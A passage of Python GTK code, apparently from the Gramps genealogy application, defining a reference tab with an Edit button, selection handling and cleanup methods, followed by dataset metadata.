self._callback()
def right_click(self, obj, event):
return
def _cleanup_local_connects(self):
self.model.disconnect(self.connectid)
def _cleanup_on_exit(self):
# model may be destroyed already in closing managedwindow
if hasattr(self, 'model'):
self.model.destroy()
def is_empty(self):
return self.model.count == 0
def _create_buttons(self, share=False, move=False, jump=False, top_label=None):
"""
Create a button box consisting of one button: Edit.
        This button box is then appended to hbox (self).
Method has signature of, and overrides create_buttons from _ButtonTab.py
"""
self.edit_btn = SimpleButton('gtk-edit', self.edit_button_clicked)
self.edit_btn.set_tooltip_text(_('Edit reference'))
hbox = Gtk.Box()
hbox.set_spacing(6)
hbox.pack_start(self.edit_btn, False, True, 0)
hbox.show_all()
self.pack_start(hbox, False, True, 0)
self.add_btn = None
self.del_btn = None
self.track_ref_for_deletion("edit_btn")
self.track_ref_for_deletion("add_btn")
self.track_ref_for_deletion("del_btn")
def _selection_changed(self, obj=None):
if self.dirty_selection:
return
if self.get_selected():
self.edit_btn.set_sensitive(True)
else:
self.edit_btn.set_sensitive(False)
def get_data(self):
return self.obj
def column_order(self):
return ((1, 0), (1, 1), (1, 2))
def find_node(self):
(model, node) = self.selection.get_selected()
try:
return (model.get_value(node, 4), model.get_value(node, 3))
except:
return (None, None)
def edit_button_clicked(self, obj):
(reftype, ref) = self.find_node()
edit_object(self.dbstate, self.uistate, reftype, ref)
| gpl-2.0 | 2,038,408,885,428,916,200 | 32.854015 | 83 | 0.544631 | false |